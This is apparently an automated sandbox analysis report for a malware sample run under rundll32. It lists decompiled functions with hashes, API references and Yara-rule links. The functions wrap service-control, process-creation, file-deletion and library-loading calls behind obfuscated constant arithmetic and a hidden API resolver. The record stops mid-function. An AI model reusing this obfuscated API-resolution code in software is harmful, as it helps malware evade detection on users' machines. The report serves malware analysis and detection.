Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 485c5e609fe2aec3bc199f0c517ab32974bb55217e71692408e913989f17a245
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 0111C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862160D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0020981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0020981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002007A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00209821
0x00209822
0x00209825
0x00209828
0x0020982a
0x0020982c
0x0020982f
0x00209832
0x00209835
0x00209836
0x00209837
0x0020983c
0x00209855
0x00209858
0x0020985f
0x00209866
0x0020986d
0x00209874
0x0020987b
0x0020988e
0x0020989b
0x002098a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001F87F2,0000CAAE,0000510C,AD82F196), ref: 0020989B

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 1129fbc2d41107b07c5125bba92e75e737e23df9f0a9dadb9c0d9eff1fb701ab
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 92019A72801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6715B219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00207BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00207BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002007A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00207bf7
0x00207bf8
0x00207bfa
0x00207bfd
0x00207bff
0x00207c02
0x00207c06
0x00207c07
0x00207c0f
0x00207c1d
0x00207c25
0x00207c2d
0x00207c31
0x00207c38
0x00207c3f
0x00207c46
0x00207c4a
0x00207c5e
0x00207c67
0x00207c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00207C67

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 0bd237f299dba071f9f118eedf935ca560909e1e9c893418f39fac6ec27e5db5
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 0C014FB190120CFFEB09DF94C84A9DEBBB5EF45314F208198F50567250EBB15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001FF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001FF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002007A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x001ff662
0x001ff663
0x001ff665
0x001ff668
0x001ff66a
0x001ff66d
0x001ff670
0x001ff673
0x001ff677
0x001ff678
0x001ff67d
0x001ff687
0x001ff693
0x001ff69a
0x001ff6a1
0x001ff6a5
0x001ff6a9
0x001ff6b0
0x001ff6c9
0x001ff6d8
0x001ff6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001FF6D8

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 0ba70dfcec261f9c2b8ba06074caf9871ca36b38ce8cbd8547282b028e6c8062
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: FF01E5B690120CBBEF059F94DC468DF7F75EB05324F148188F90462250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001FB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001FB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001F602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002007A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001fb6f3
0x001fb6f8
0x001fb702
0x001fb70b
0x001fb712
0x001fb719
0x001fb720
0x001fb727
0x001fb72e
0x001fb747
0x001fb759
0x001fb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001FB759

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: b1d20f5bfc209d41f81da95ba7a171abb8ca67a26d1bf3f6441a10f7ed33f6b7
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: CC018BB294030CFBEF45DF90DD06E9E7BB5EF18704F108188FA09261A0D3B25E20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0020AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002007A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0020aa3f
0x0020aa40
0x0020aa41
0x0020aa44
0x0020aa47
0x0020aa4b
0x0020aa4c
0x0020aa51
0x0020aa5b
0x0020aa64
0x0020aa68
0x0020aa6f
0x0020aa76
0x0020aa8d
0x0020aa90
0x0020aa9d
0x0020aaa8
0x0020aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0020AAA8

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 47197d10c455c84a89c7741739c354172d350b13dcd5ceef6f090ec2054df0fc
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: F0F069B190020CFFDF08DF94DD4A99EBFB4EB41304F108088F905A6260D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 001F5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001F5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002007A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001f5fb5
0x001f5fb6
0x001f5fb7
0x001f5fbb
0x001f5fbc
0x001f5fc1
0x001f5fcb
0x001f5fd7
0x001f5fde
0x001f5fe5
0x001f5ffc
0x001f5fff
0x001f6006
0x001f600d
0x001f601a
0x001f6025
0x001f602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001F6025

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 69b7a602794ff9f7d4ed518adff1221bfcb0fd5835044999a835a919fe29db3f
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: ADF04FB0C1120CFFEB08DFA0E94689EBFB8EB40300F208198E509A7260E7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2732 Parent PID: 2688 rundll32.exeCOMMON

Executed Functions

Function 001F2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001F2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001F602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002007A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001F29DC

Strings

<^, xrefs: 001F2977

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 22c181d947d5c3b9079b2eb04d44297966d1c9b7dd736f612a36f4591dae9978
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 1B018072A00208BFEB14DF95DC4A8DFBFB6EF45310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001FC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001FC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001F602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002007A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001fc6e1
0x001fc6e6
0x001fc6f0
0x001fc6fc
0x001fc703
0x001fc706
0x001fc70d
0x001fc711
0x001fc715
0x001fc71c
0x001fc723
0x001fc72a
0x001fc731
0x001fc738
0x001fc751
0x001fc762
0x001fc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001FC762

Strings

/O, xrefs: 001FC6E6

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 79b4102c1dea873a57f12ff49eb32eefa7696dc2b46041cafa4feff527189ffe
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 131133B290122DBBCB25DF95DC498EFBFB8EF05714F108188F90962220D7714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001F1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001F1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001F602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002007A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001F1096

Strings

[, xrefs: 001F103B

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: f83f6239cc42481eb679efaf5e71d5d5f3602f9487418f8f8d18f83b15cf1aba
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 9F016DB6D0130CFBEF04DF94C94A6DEBBB1EF54318F108188F51466291D7B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001F4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001F4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002007A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001f485e
0x001f487a
0x001f487d
0x001f4884
0x001f488b
0x001f4892
0x001f489d
0x001f48a0
0x001f48ad
0x001f48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001F48B7

Strings

[, xrefs: 001F488B

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 16d6e7736e5bd83a05d39598fdceb209443255c5151720051fd0e763d1ad046e
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: CFF01D70915309FBDB04CFE8C95699EBFB5EB40301F20818CE444B7290E3715F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00204F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00204F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002007A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00204f80
0x00204f81
0x00204f82
0x00204f86
0x00204f87
0x00204f8c
0x00204fa5
0x00204fa8
0x00204faf
0x00204fb6
0x00204fc7
0x00204fca
0x00204fd7
0x00204fe2
0x00204fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00204FE2

Strings

{#lm, xrefs: 00204FC2

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 3baa9677071f580ff9ed1589da305fef3c7bc8fa5d74d7cd9fe7e1eb2b31d20e
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 19F037B081120CFFEB04DFA4D98289EBFBAEB41300F208199E804AB260D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0020976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0020976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002007A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

APIs

CreateProcessW.KERNEL32(001F591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001F591A), ref: 00209816

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: e9e095bef4881a598618a2ea78be183212cec5bc99613d49aec6f9932c7d2903
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 8A11B372901148BBDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001FB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001FB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001F602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002007A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

APIs

CreateFileW.KERNELBASE(00200668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00200668,?,?,?,?), ref: 001FB5FD

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 485c5e609fe2aec3bc199f0c517ab32974bb55217e71692408e913989f17a245
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 0111C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862160D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0020981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0020981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
